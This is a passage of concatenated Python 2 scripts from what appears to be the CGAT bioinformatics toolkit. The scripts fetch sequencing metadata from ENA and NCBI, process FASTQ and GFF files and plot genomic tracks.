# Write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/ena2table.py
```python
import sys
import urllib2
import urllib
import collections
import xml.etree.ElementTree as ET
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
from Bio import Entrez
# mapping various combinations of library_source and selection
# to an experiment type
MAP_CODE2DESIGN = \
{
("CAGE", "TRANSCRIPTOMIC"): 'CAGE',
("ChIP", "GENOMIC"): "ChIP-Seq",
("DNase", "GENOMIC"): "DNase-Seq",
("Hybrid Selection", "GENOMIC"): "Exome-Seq",
("cDNA", "TRANSCRIPTOMIC"): "RNA-Seq",
("PCR", "GENOMIC"): "Genome-Seq",
}
# all other:
# ChIP OTHER 45
# ChIP TRANSCRIPTOMIC 17
# DNase TRANSCRIPTOMIC 133
# "Hybrid Selection" TRANSCRIPTOMIC 8
# "MBD2 protein methyl-CpG binding domain" GENOMIC 238
# MDA GENOMIC 340
# MNase GENOMIC 316
# PCR GENOMIC 1829
# PCR METAGENOMIC 56
# PCR OTHER 12
# PCR SYNTHETIC 8
# PCR TRANSCRIPTOMIC 73
# RACE TRANSCRIPTOMIC 4
# RANDOM GENOMIC 51129
# RANDOM METAGENOMIC 158
# RANDOM METATRANSCRIPTOMIC 2
# RANDOM "NON GENOMIC" 37
# RANDOM OTHER 55
# RANDOM TRANSCRIPTOMIC 751
# "RANDOM PCR" GENOMIC 172
# "RANDOM PCR" TRANSCRIPTOMIC 41
# RT-PCR GENOMIC 3
# RT-PCR "NON GENOMIC" 8
# RT-PCR TRANSCRIPTOMIC 126
# "Reduced Representation" GENOMIC 442
# "Restriction Digest" GENOMIC 87
# cDNA GENOMIC 63
# cDNA METATRANSCRIPTOMIC 2
# cDNA "NON GENOMIC" 73
# cDNA OTHER 431
# other GENOMIC 2845
# other METAGENOMIC 16
# other OTHER 306
# other SYNTHETIC 2756
# other TRANSCRIPTOMIC 428
# "padlock probes capture method" GENOMIC 61
# "size fractionation" GENOMIC 121
# "size fractionation" METAGENOMIC 8
# "size fractionation" OTHER 2
# "size fractionation" TRANSCRIPTOMIC 1303
# unspecified GENOMIC 5138
# unspecified OTHER 50
# unspecified SYNTHETIC 14
# unspecified TRANSCRIPTOMIC 337
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: cgat_script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("--library-source", dest="library_source", type="string",
help="supply help")
parser.add_option("--library-selection", dest="library_selection", type="string",
help="supply help")
parser.add_option("--tax-identifier", dest="tax_id", type="int",
help="supply help")
parser.set_defaults(library_source=None,
library_selection=None,
tax_id=9606)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# tree = ET.parse('/ifs/home/andreas/ena.xml')
# root = tree.getroot()
# for study in root.findall("STUDY"):
# alias = study.attrib["alias"]
# center_name = study.attrib["center_name"]
# accession = study.attrib["accession"]
# try:
# description = study.find("*/STUDY_DESCRIPTION").text
# description = description.encode('ascii', 'ignore')
# except AttributeError:
# description = ""
# options.stdout.write( "\t".join( (alias,
# accession,
# center_name,
# description ) ) + "\n")
#query_url = "http://www.ebi.ac.uk/ena/data/warehouse/search?query=%22tax_eq%289606%29%20AND%20library_source=%22TRANSCRIPTOMIC%22%20AND%20%28instrument_model=%22Illumina%20Genome%20Analyzer%20II%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%20IIx%22%20OR%20instrument_model=%22Illumina%20HiScanSQ%22%20OR%20instrument_model=%22Illumina%20HiSeq%201000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202500%22%29%22&domain=read&download=txt"
#query_url = "http://www.ebi.ac.uk/ena/data/view/search?query=%22tax_eq%289606%29%20AND%20library_source=%22TRANSCRIPTOMIC%22%20AND%20%28instrument_model=%22Illumina%20Genome%20Analyzer%20II%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%20IIx%22%20OR%20instrument_model=%22Illumina%20HiScanSQ%22%20OR%20instrument_model=%22Illumina%20HiSeq%201000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202500%22%29%22&domain=read&download=txt"
#query_url = "http://www.ebi.ac.uk/ena/data/warehouse/search?query=%22(instrument_model=%22Illumina%20HiSeq%202000%22%20OR%20instrument_model=%22Illumina%20HiSeq%201000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202500%22)%20AND%20library_layout=%22PAIRED%22%20AND%20library_source=%22TRANSCRIPTOMIC%22%22&domain=read"
# query_url = "http://www.ebi.ac.uk/ena/data/view/A00145&display=xml"
query_url = "http://www.ebi.ac.uk/ena/data/warehouse/search"
data_url = "http://www.ebi.ac.uk/ena/data/view"
#params = None
# query_url = "http://www.ebi.ac.uk/ena/data/view/DRP000011&display=xml"
fields = ['base_count',
'read_count',
'instrument_model',
'scientific_name',
'library_layout',
'library_source',
'library_strategy',
'library_selection',
'experiment_accession',
'experiment_title',
'study_accession',
'study_title',
'first_public',
'submission_accession',
'center_name',
]
query = 'tax_eq(%i) AND instrument_platform="ILLUMINA"' % (options.tax_id)
if options.library_source:
query += ' AND library_source="%s" ' % options.library_source
if options.library_selection:
query += ' AND library_selection="%s" ' % options.library_selection
# collect pre-study results
params = urllib.urlencode({'query': query,
'display': 'report',
'fields': ",".join(fields),
'result': 'read_run'})
E.debug("?".join((query_url, params)))
lines = urllib2.urlopen(query_url, params)
header = lines.readline()
fields.insert(0, 'run_accession')
DATA = collections.namedtuple("DATA", fields)
fields.append("read_length")
fields.append("design")
table_study = options.stdout # IOTools.openFile( "study.tsv", "w" )
table_study.write("\t".join(fields) + "\n")
# collect a list of all studies
studies = set()
for line in lines:
# line endings are \r\n for data, but only \n for header
line = line[:-2]
data = DATA(*line.split("\t"))
try:
read_length = float(data.base_count) / float(data.read_count)
except ValueError:
read_length = 0
if data.library_layout == "PAIRED":
read_length /= 2.0
design = MAP_CODE2DESIGN.get(
(data.library_selection, data.library_source),
"other")
table_study.write(
line + "\t" + str(read_length) + "\t" + design + "\n")
studies.add(data.study_accession)
table_studies = IOTools.openFile("studies.tsv", "w")
studies_fields = ["study_accession", "nreferences", "pubmed_ids"]
table_studies.write("\t".join(studies_fields) + "\n")
return
# params = urllib.urlencode( { 'display' : 'xml' } )
# url = "/".join( ( data_url, 'SRP013999') ) + "&" + params
# print urllib2.urlopen( url ).read()
for study_accession in studies:
# get additional info
params = urllib.urlencode({'display': 'xml'})
url = "/".join((data_url, study_accession)) + "&" + params
info_lines = urllib2.urlopen(url)
tree = ET.parse(info_lines)
root = tree.getroot()
pmids = []
for link in root.findall('*//XREF_LINK'):
db = link.find('DB').text
if db == "pubmed":
pmids.append(link.find('ID').text)
# get geo
geos = []
for attribute in root.findall('*//STUDY_ATTRIBUTE'):
if attribute.find('TAG').text == "GEO Accession":
geos.append(attribute.find('VALUE').text)
params = {'dbfrom': 'gds',
'db': 'pubmed',
}
geo_pmids = []
for geo in geos:
Entrez.email = "<EMAIL>"
handle = Entrez.esearch(db="gds", retmax=1, term=geo)
record = Entrez.read(handle)
uids = record['IdList']
handle.close()
for uid in uids:
record = Entrez.read(Entrez.elink(dbfrom="gds",
dbto="pubmed",
id=uid))
linksets = record[0]["LinkSetDb"]
if not linksets:
continue
assert len(linksets) == 1
for linksetdb in linksets:
geo_pmids = [x['Id'] for x in linksetdb["Link"]]
if not pmids:
pmids = geo_pmids
table_studies.write("\t".join(map(str, (
study_accession,
len(pmids),
",".join(pmids),
len(geos),
",".join(geos)))) + "\n")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/fasta2gff.py
```python
import sys
import CGAT.Experiment as E
import CGAT.IndexedFasta as IndexedFasta
import CGAT.GTF as GTF
USAGE = """python %s [OPTIONS]
Version: $Id: fasta2gff.py 2861 2010-02-23 17:36:32Z andreas $
""" % sys.argv[0]
def writeHeader(outfile):
outfile.write("\t".join(("contig",
"nresidues",
"ngaps",
"nseqregions",
"ngapregions",
"nA", "nC", "nG", "nT",
"nN", "nX", "nO")) + "\n")
def main(argv=None):
parser = E.OptionParser(
version="%prog version: $Id: fasta2gff.py 2861 2010-02-23 17:36:32Z andreas $")
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome.")
parser.add_option("-a", "--as-gtf", dest="as_gtf", action="store_true",
help="output as gtf.")
parser.add_option("-f", "--fragment-size", dest="fragment_size", type="int",
help="fixed size of fragments [default=%default].")
parser.add_option("-s", "--sample-size", dest="sample_size", type="int",
help="fixed size of fragments.")
parser.set_defaults(
as_gtf=False,
genome_file=None,
fragment_size=1000,
sample_size=10000,
pattern_id="%08i",
)
(options, args) = E.Start(parser)
fasta = IndexedFasta.IndexedFasta(options.genome_file)
contigs = fasta.getContigSizes()
if options.as_gtf:
entry = GTF.Entry()
else:
entry = GTF.Entry()
n = 0
entry.feature = "exon"
entry.source = "random"
for x in range(options.sample_size):
entry.contig, entry.strand, entry.start, entry.end = fasta.getRandomCoordinates(
options.fragment_size)
if entry.strand == "-":
l = contigs[entry.contig]
entry.start, entry.end = l - entry.end, l - entry.start
if options.as_gtf:
entry.gene_id = options.pattern_id % n
entry.transcript_id = entry.gene_id
options.stdout.write(str(entry) + "\n")
n += 1
E.Stop()
if __name__ == "__main__":
sys.exit(main())
```
#### File: cgat/scripts/fastqs2fastqs.py
```python
import sys
import re
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
class PatternGetter:
def __init__(self, pattern):
self.pattern = re.compile(pattern)
def __call__(self, id):
return self.pattern.search(id).groups()[0]
def plain_getter(id):
return id
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-m", "--method", dest="method", type="choice",
choices=('reconcile',),
help="method to apply [default=%default].")
parser.add_option(
"-c", "--chop-identifier", dest="chop", action="store_true",
help="whether or not to trim last character of the "
"sequence name. For example sometimes ids in the first "
"file in the pair will end with \1 and the second "
"with \2. If --chop-identifier is not specified "
"then the results will be wrong [default=%default].")
parser.add_option(
"-u", "--unpaired", dest="unpaired", action="store_true",
help="whether or not to write out unpaired reads "
"to a separate file")
parser.add_option(
"--id-pattern-1", dest="id_pattern_1",
help="If specified will use the first group from the"
"pattern to determine the ID for the first read",
default=None)
parser.add_option(
"--id-pattern-2", dest="id_pattern_2",
help="As above but for read 2",
default=None)
parser.add_option(
"-o", "--output-filename-pattern",
dest="output_pattern", type="string",
help="pattern for output files [default=%default].")
parser.set_defaults(
method="reconcile",
chop=False,
unpaired=False,
output_pattern="%s.fastq.gz",
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
"please supply at least two fastq files on the commandline")
fn1, fn2 = args
c = E.Counter()
if options.id_pattern_1:
id1_getter = PatternGetter(options.id_pattern_1)
else:
id1_getter = plain_getter
if options.id_pattern_2:
id2_getter = PatternGetter(options.id_pattern_2)
else:
id2_getter = plain_getter
if options.method == "reconcile":
# IMS: switching to no store second set of read names and only use
# lazily. Since generators don't have a size must keep track
id_lengths = {fn1: 0, fn2: 0}
def getIds(infile, id_getter=plain_getter):
'''return ids in infile.'''
aread = infile.readline
while True:
l = [aread().rstrip("\r\n") for i in range(4)]
if not l[0]:
break
r = id_getter(l[0].split()[0])
# decide if to chop read number off
id_lengths[infile.name] += 1
if options.chop:
yield r[:-1]
else:
yield r
def write(outfile, infile, take, unpaired_file=None,
id_getter=plain_getter):
'''filter fastq files with ids in take.'''
aread = infile.readline
while True:
l = [aread().rstrip("\r\n") for i in range(4)]
if not l[0]:
break
r = id_getter(l[0].split()[0])
if options.chop:
r = r[:-1]
if r not in take:
if unpaired_file is None:
continue
else:
unpaired_file.write("\n".join(l) + "\n")
else:
outfile.write("\n".join(l) + "\n")
E.info("reading first in pair")
inf1 = IOTools.openFile(fn1)
ids1 = set(getIds(inf1, id1_getter))
E.info("reading second in pair")
inf2 = IOTools.openFile(fn2)
# IMS: No longer keep as a set, but lazily evaluate into intersection
# leads to large memory saving for large inf2, particularly if
# inf1 is small.
ids2 = getIds(inf2, id2_getter)
take = ids1.intersection(ids2)
E.info("first pair: %i reads, second pair: %i reads, "
"shared: %i reads" %
(id_lengths[fn1],
id_lengths[fn2],
len(take)))
if options.unpaired:
unpaired_filename = IOTools.openFile(
options.output_pattern % "unpaired", "w")
else:
unpaired_filename = None
with IOTools.openFile(options.output_pattern % "1", "w") as outf:
inf = IOTools.openFile(fn1)
E.info("writing first in pair")
write(outf, inf, take, unpaired_filename, id1_getter)
with IOTools.openFile(options.output_pattern % "2", "w") as outf:
inf = IOTools.openFile(fn2)
E.info("writing second in pair")
write(outf, inf, take, unpaired_filename, id2_getter)
if options.unpaired:
unpaired_filename.close()
# write footer and output benchmark information.
E.info("%s" % str(c))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/geo2table.py
```python
import sys
import re
import urllib2
import urllib
import xml.etree.ElementTree as ET
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: cgat_script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-t", "--test", dest="test", type="string",
help="supply help")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
params = {'db': 'gds',
'term': 'transcriptome[All Fields] AND "Homo sapiens"[Organism] AND high throughput sequencing[Platform Technology Type]',
'retmax': 5000,
'usehistory': 'y',
}
params = urllib.urlencode(params)
query_filter = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi'
query_retrieve = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/elink.fcgi'
query_fetch = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi'
query_summary = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi'
data = urllib2.urlopen(query_filter, params)
etree = ET.parse(data)
root = etree.getroot()
webenv = root.find("WebEnv").text
query_key = root.find("QueryKey").text
uids = [x.text for x in root.findall("*/Id")]
pubmedlist = []
params = {'dbfrom': 'gds',
'db': 'pubmed',
}
params = urllib.urlencode(params)
# necessary to preserve 1to1 links
params += "&" + "&".join(["id=%s" % x for x in uids])
data = urllib2.urlopen(query_retrieve, params)
etree = ET.parse(data)
root = etree.getroot()
map_uid2pmid = {}
for linkset in root.findall("LinkSet"):
uid = linkset.find("*/Id").text
try:
pmid = linkset.find("./LinkSetDb/Link/Id").text
except AttributeError:
pmid = None
map_uid2pmid[uid] = pmid
params = {'db': 'gds',
'id': ",".join(uids)}
params = urllib.urlencode(params)
data = urllib2.urlopen(query_fetch, params).read()
map_uid2accession = {}
map_uid2description = {}
map_pmid2accession = {}
for block in data.split("\n\n"):
uid = re.search("ID: (\d+)", block).groups()[0]
accession = re.search("Accession: (\S+)", block).groups()[0]
map_uid2accession[uid] = accession
lines = block.split("\n")
description = lines[0]
map_uid2description[uid] = description
map_pmid2accession[map_uid2pmid[uid]] = accession.encode(
"ascii", "ignore")
url_pmid = "http://www.ncbi.nlm.nih.gov/pubmed/%s"
url_geo = "http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=%s"
outfile_uid = IOTools.openFile("uids.tsv", "w")
outfile_uid.write("uid\tdescription\tpmid\taccession\n")
for uid in uids:
outfile_uid.write("\t".join(map(str,
(uid,
map_uid2description[uid],
url_pmid % map_uid2pmid.get(uid, ""),
url_geo % map_uid2accession.get(uid, "")))) + "\n")
outfile_pmid = IOTools.openFile("pmid.tsv", "w")
outfile_pmid.write("pmid\tyear\tjournal\ttitle\tabstract\tgeo\n")
E.info("retrieving pubmed records")
# output by pubmed id
for pmid in map_uid2pmid.values():
if pmid is None:
continue
print pmid
# retrieve record
params = {'db': 'pubmed',
'id': pmid,
'retmode': 'xml'}
params = urllib.urlencode(params)
data = urllib2.urlopen(query_fetch, params)
etree = ET.parse(data)
root = etree.getroot()
article = root.find("PubmedArticle")
assert article is not None
journal = article.find("*//Journal")
assert journal is not None
year = journal.find("./JournalIssue/PubDate/Year").text
journal_title = journal.find("Title").text
title = article.find("*//ArticleTitle").text.encode("ascii", "ignore")
try:
abstract = article.find(
"*//AbstractText").text.encode("ascii", "ignore")
except AttributeError:
abstract = ""
outfile_pmid.write("\t".join(map(str,
(url_pmid % pmid,
year,
journal_title,
title,
abstract,
url_geo % map_pmid2accession.get(pmid, "")))) + "\n")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gff2plot.py
```python
import sys
import os
import ConfigParser
import matplotlib
import pylab
import matplotlib.ticker
import numpy
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
def formatGenomicCoordinate(value, pos=None):
decimals = 0
exps = ['', 'k', 'm', 'g', 't']
suffix = ""
value = int(value)
format = "%%.%if%%s%s" % (int(decimals), suffix)
for exp in xrange(len(exps) - 1, -1, -1):
if value < 1000L ** (exp):
continue
else:
return format % (float(value) / 1000L ** (exp), exps[exp])
break
else:
return str(value)
def enterParams(o, params):
"""enter params from object o if they exists.
Supply a tuple of name, conversion function for non-string
options.
"""
r = {}
for p in params:
if isinstance(p, tuple):
p, f = p
else:
f = str
if hasattr(o, p):
r[p] = f(getattr(o, p))
return r
def normalizeValuesByWindows(data, window_size=None):
"""normalize to constant window size.
If no window size is given, the smallest window is used. Windows
smaller than windows-size are ignored.
"""
if not options.window_size:
window_size = min(map(lambda x: x[1] - x[0], data))
new_values = []
for start, end, value in data:
if end - start < window_size:
continue
start = start - start % window_size
for z in range(start, end, window_size):
new_values.append((z, value))
new_values.sort()
# interpolate values for the same windows with average
xvals = []
yvals = []
last_x = None
values = []
for x, value in new_values:
if last_x != x:
if last_x is not None:
xvals.append(last_x)
yvals.append(numpy.mean(values))
values = []
last_x = x
values.append(value)
return xvals, yvals
#-------------------------------------------------------------------
#-------------------------------------------------------------------
#-------------------------------------------------------------------
def addPlot(ax, track, contig, nplotted,
nsubplotted=None,
nsubplots=None,
y_min=None,
y_max=None):
"""add a track to an axes object.
"""
if contig not in track.mData:
return
# step function
# datapoint is in window average
xvals = map(lambda x: (x[1] + x[0]) / 2.0, track.mData[contig])
yvals = map(lambda x: x[2], track.mData[contig])
l = len(xvals)
if nsubplots:
plotnum = nsubplotted
else:
plotnum = nplotted
if track.style == "matrix":
# unequal window sizes confuse the image. Therefore, normalize
# xvals and yvals to a constant image size
matrix = pylab.array(yvals)
matrix.shape = (1, len(yvals))
# make sure that the extent of the image and the plot coincide by
# using extent
if nsubplots is not None:
y_width = float(y_max - y_min) / nsubplots
extent = (min(xvals), max(xvals), y_min + y_width *
nsubplotted, y_min + y_width * (nsubplotted + 1))
else:
extent = (min(xvals), max(xvals), min(yvals), max(yvals))
ax.imshow(matrix,
cmap=track.color_scheme,
extent=extent,
interpolation="nearest")
symbol = options.symbols[plotnum % len(options.symbols)]
plot = ax.plot(xvals, yvals, symbol, lw=2)
else:
symbol = options.symbols[plotnum % len(options.symbols)]
plot = ax.plot(xvals, yvals, symbol)
return plot
#-------------------------------------------------------------------
#-------------------------------------------------------------------
#-------------------------------------------------------------------
def plotContig(contig, tracks, options, plot_legend=False,
extra_features=None):
"""plot data for contig."""
if extra_features and "figure" in extra_features:
figure = pylab.figure(**enterParams(extra_features['figure'],
(("figsize", lambda x: map(int, x.split(","))),
("dpi", int),
"facecolor",
"edgecolor")))
else:
figure = pylab.figure()
if plot_legend:
if extra_features and "legend" in extra_features:
legend = pylab.figure(**enterParams(extra_features['legend'],
(("figsize", lambda x: map(int, x.split(","))),
("dpi", int),
"facecolor",
"edgecolor")))
else:
legend = pylab.figure()
lx = legend.add_axes((0.1, 0.1, 0.9, 0.9))
lx.set_title("Legend")
lx.set_axis_off()
else:
legend = None
axes = []
ywidth = 0.8 / float(len(tracks))
yoffset = 0.1
axprops = {}
ayprops = {}
min_x, max_x = 1000000000, 0
for track in tracks:
if track.mData:
min_x = min(min_x, min(map(lambda x: (x[0]), track.mData[contig])))
max_x = max(max_x, max(map(lambda x: (x[1]), track.mData[contig])))
# make sure that we use the same view for all axes
axprops['xlim'] = (min_x, max_x)
nplotted = 0
for track in tracks:
labels, plots = [], []
ax = figure.add_axes(
(0.1, track.mYOffset, 0.8, track.mYWidth), **axprops)
if 'sharex' not in axprops:
ax.xaxis.set_major_formatter(
matplotlib.ticker.FuncFormatter(formatGenomicCoordinate))
ax.set_xlabel("Genomic position / Mb")
axprops['sharex'] = ax
else:
pylab.setp(ax.get_xticklabels(), visible=False)
ax.set_ylabel(track.mTitle, **ayprops)
if track.mSubTracks:
# compute maximum extent of y-axis in all of subtracks
first = True
for tt in track.mSubTracks:
if first:
min_y = min(map(lambda x: x[2], tt.mData[contig]))
max_y = max(map(lambda x: x[2], tt.mData[contig]))
first = False
else:
min_y = min(
min_y, min(map(lambda x: x[2], tt.mData[contig])))
max_y = max(
max_y, max(map(lambda x: x[2], tt.mData[contig])))
nsubplotted = 0
for tt in track.mSubTracks:
plot = addPlot(ax, tt, contig, nplotted,
nsubplotted, len(track.mSubTracks),
min_y, max_y)
nsubplotted += 1
plots.append(plot)
if hasattr(tt, "legend"):
labels.append(tt.legend)
else:
labels.append(tt.mTitle)
else:
min_y = min(map(lambda x: x[2], track.mData[contig]))
max_y = max(map(lambda x: x[2], track.mData[contig]))
if options.global_colours:
n_for_colour = nplotted
else:
n_for_colour = 0
plot = addPlot(ax, track, contig, n_for_colour)
plots.append(plot)
if hasattr(track, "legend"):
lables.append(track.legend)
else:
labels.append(track.mTitle)
# reduce number of ticks by 2
old_ticks = ax.get_yticks()
step_size = (old_ticks[1] - old_ticks[0]) * 2
new_ticks = list(pylab.arange(old_ticks[0], old_ticks[-1], step_size))
ax.set_yticks(new_ticks)
if nplotted % 2 == 0:
ax.yaxis.set_ticks_position("right")
ax.yaxis.set_label_position("right")
else:
ax.yaxis.set_ticks_position("left")
ax.yaxis.set_label_position("left")
# deal with extra_features
if extra_features:
for key, config in extra_features.items():
if key == "vlines":
if contig not in config.mData:
continue
lines = []
for start, end, value in config.mData[contig]:
lines.append(start)
lines.append(end)
ax.vlines(
lines, min_y, max_y, **enterParams(config, ("colour", "linewidth")))
nplotted += 1
if legend:
lx = legend.add_axes((0.1, track.mYOffset, 0.8, track.mYWidth))
pylab.setp(lx.get_xticklabels(), visible=False)
lx.set_xticks([])
lx.set_yticks([])
lx.text(0.4, 0.5, track.mTitle)
lx.legend(plots, labels, 'center left')
if hasattr(track, "text"):
lx.text(0.6, 0.2, track.text, size="smaller",
clip_on=True)
ax.set_title(contig)
# has to be set at the end, otherwise re-scaled?
ax.set_xlim(min_x, max_x)
return figure, legend
def readData(infile):
"""read data from infile."""
dd = {}
for line in infile:
if line[0] == "#":
continue
d = line[:-1].split("\t")
contig, start, end, score = d[0], int(d[3]), int(d[4]), float(d[5])
# if contig != "I": continue
if contig not in dd:
dd[contig] = []
dd[contig].append((start, end, score))
return dd
class Track:
def __init__(self, title,
priority=0,
data=None,
subtracks=None,
config=None):
self.mTitle = title
self.mData = data
self.mSubTracks = subtracks
self.height = 1.0
self.priority = priority
self.style = "default"
self.color_scheme = None
if config:
for key, value in config.items(section):
setattr(self, key, value)
def layoutTracks(tracks):
"""layout tracks."""
# combine subtracks - these are ordered by appearance
for track in tracks.values():
if track.mSubTracks:
s = []
for subtrack in track.mSubTracks:
s.append(tracks[subtrack])
del tracks[subtrack]
track.mSubTracks = s
# sort by priority and compute heights
total_width = sum(map(lambda x: x.height, tracks.values()))
# convert to list - this is the order in which the tracks will
# be output
tracks = list(tracks.values())
tracks.sort(lambda x, y: cmp(x.priority, y.priority))
yoffset = 0.1
ymax_width = 0.8
for track in tracks:
track.mYOffset = yoffset
width = ymax_width * track.height / total_width
track.mYWidth = width
yoffset += width
return tracks
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: gff2plot.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])
parser.add_option("-f", "--file", dest="filenames", type="string",
help="files[s] to take data from,stdin = -.")
parser.add_option("", "--symbols", dest="symbols", type="string",
help="symbols to use for each histogram [steps|...].")
parser.add_option("--slide-show", dest="slide_show", type="choice",
choices=("first", "all", "sequence"),
help="do a slide show - otherwise, write image to file.")
parser.add_option("--config", dest="filename_config", type="string",
help="filename of track configuration file.")
parser.add_option("--dpi", dest="dpi", type="int",
help="dpi for hardcopy output.")
parser.add_option("--window-size", dest="window_size", type="int",
help="window-size.")
parser.add_option("--output-filename-pattern", dest="output_pattern_image", type="string",
help="output pattern for images. Should contain a '%(contig)s' pattern .")
parser.add_option("--global-colours", dest="global_colours", action="store_true",
help="cycle through colours for all tracks.")
parser.set_defaults(
filenames=None,
symbols="k-,b-,r-,c-,m-,y-,g-",
output_pattern_image="%(contig)s.png",
slide_show=None,
window_size=None,
filename_config=None,
dpi=None,
global_colours=False,
)
(options, args) = E.Start(parser)
options.symbols = options.symbols.split(",")
#--------------------------------------------------------
# collect all the data
# list of data per source and contig
tracks = {}
extra_features = {}
if options.filenames:
options.filenames = options.filenames.split(",")
if len(args) > 0:
options.filenames = args
if options.filenames:
for filename in options.filenames:
if filename == "-":
infile = sys.stdin
else:
infile = IOTools.openFile(filename)
data = readData(infile)
if filename != "-":
infile.close()
track[filename] = Track(title=filename, data=data)
elif options.filename_config:
# get track information from config file
config = ConfigParser.ConfigParser()
config.read(os.path.expanduser(options.filename_config))
# first extract special sections
for section in config.sections():
if section == "vlines":
infile = IOTools.openFile(config.get(section, "filename"), "r")
data = readData(infile)
infile.close()
extra_features[section] = Track(title=section,
data=data,
config=config)
config.remove_section(section)
elif section in ("figure", "legend"):
extra_features[section] = Track(title=section,
data=None,
config=config)
config.remove_section(section)
n = 0
for section in config.sections():
if config.has_option(section, "filename"):
infile = IOTools.openFile(config.get(section, "filename"), "r")
data = readData(infile)
infile.close()
tracks[section] = Track(title=section,
data=data,
priority=n,
config=config)
elif config.has_option(section, "tracks"):
subtracks = config.get(section, "tracks")
subtracks = map(lambda x: x.strip(), subtracks.split(","))
tracks[section] = Track(title=section,
data=None,
config=config,
priority=n,
subtracks=subtracks)
n += 1
# compile set of all contigs
contigs = set()
for track in tracks.values():
if track.mData:
contigs = contigs.union(track.mData.keys())
# re-arrange tracks and subtracks
tracks = layoutTracks(tracks)
nplots = 0
figures = []
legend = None
for contig in contigs:
figure, l = plotContig(contig, tracks, options,
plot_legend=legend is None,
extra_features=extra_features)
figures.append(figure)
if l:
legend = l
if options.slide_show:
if options.slide_show == "first":
pylab.show()
elif options.slide_show == "all":
pylab.show()
elif options.slide_show == "sequence":
pylab.show()
else:
extra_args = {}
if options.dpi:
extra_args['dpi'] = options.dpi
for contig, figure in zip(contigs, figures):
params = {'contig': contig}
filename = options.output_pattern_image % params
E.info("# creating image: %s" % filename)
figure.savefig(os.path.expanduser(filename), **extra_args)
if legend:
params = {'contig': "legend"}
filename = options.output_pattern_image % params
E.info("creating image: %s" % filename)
legend.savefig(os.path.expanduser(filename), **extra_args)
E.info("ninput=%i, ncontigs=%i, nplots=%i" %
(len(tracks), nplots, len(contigs)))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gff32gtf.py
```python
import sys
import CGAT.Experiment as E
import CGAT.GFF3 as GFF3
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
def search_hierarchy(ID, hierarchy, options):
'''Returns a three element tuple of lists.
* The first two lists are the gene_ids and transcript_ids that
* are associated with specified IDs. The third is a list of
* possible transcript_ids - that is trancript_ids that are one
* level below where the gene id came from.
All three lists are guarenteed to be the same length, but both
the transcript lists could contain None values where no
transcript_id has been found.
Works by calling it self recursively, not efficient, but does
deal with the problem of cicular references: the recursion
limit will be quickly reached.
Can also raise ValueError if no feature of type
options.gene_type is found and options.missing_gene is false
'''
gene_id = []
transcript_id = []
possible_transcript_id = []
entry = hierarchy[ID]
if entry['type'] == options.gene_type:
gene_id.append(hierarchy[ID]['gene_id'])
if not entry['type'] == options.transcript_type:
transcript_id = [None]
possible_transcript_id = [None]
else:
transcript_id = [entry['transcript_id']]
possible_transcript_id = [None]
return (gene_id, transcript_id, possible_transcript_id)
for parent in entry['Parent']:
new_gene_id, new_transcript_id, new_possible_transcript_id = search_hierarchy(
parent, hierarchy, options)
gene_id.extend(new_gene_id)
transcript_id.extend(new_transcript_id)
possible_transcript_id.extend(new_possible_transcript_id)
if options.missing_gene:
possible_transcript_id = [
entry['transcript_id'] if x is None else x for x in possible_transcript_id]
if len(gene_id) == 0 and options.missing_gene:
gene_id = [entry['gene_id']]
transcript_id = [None]
possible_transcript_id = [None]
elif len(gene_id) == 0 and not options.missing_gene:
raise ValueError(
"Root found without finding an object of type %s" % options.gene_type)
if entry['type'] == options.transcript_type:
transcript_id = [
entry['transcript_id'] if x is None else x for x in transcript_id]
assert len(gene_id) == len(transcript_id) and len(
transcript_id) == len(possible_transcript_id)
assert len(gene_id) > 0
return gene_id, transcript_id, possible_transcript_id
